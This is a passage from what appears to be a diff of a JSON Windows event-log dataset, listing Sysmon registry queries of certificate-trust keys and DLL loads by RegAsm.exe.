"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\SysWOW64\\cfgmgr32.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - 
"timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570865430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865580000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\SysWOW64\\SHCore.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864030000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570865580000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\SysWOW64\\windows.storage.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864490000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\profapi.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - 
"process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864490000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\SysWOW64\\powrprof.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864650000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\SysWOW64\\fltLib.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864650000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcr120_clr0400.dll", - "image_path": "C:\\Windows\\SysWOW64\\msvcr120_clr0400.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "setupapi.dll", - "image_path": "C:\\Windows\\SysWOW64\\setupapi.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "image_load", - "image_name": "mpr.dll", - "image_path": "C:\\Windows\\SysWOW64\\mpr.dll", - "pid": 5012, - "process_name": "RegAsm.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "timestamp": 131883570864960000, - "unique_pid": "{42FC7E13-CADE-5C05-0000-0010ED3A4D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570866210000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 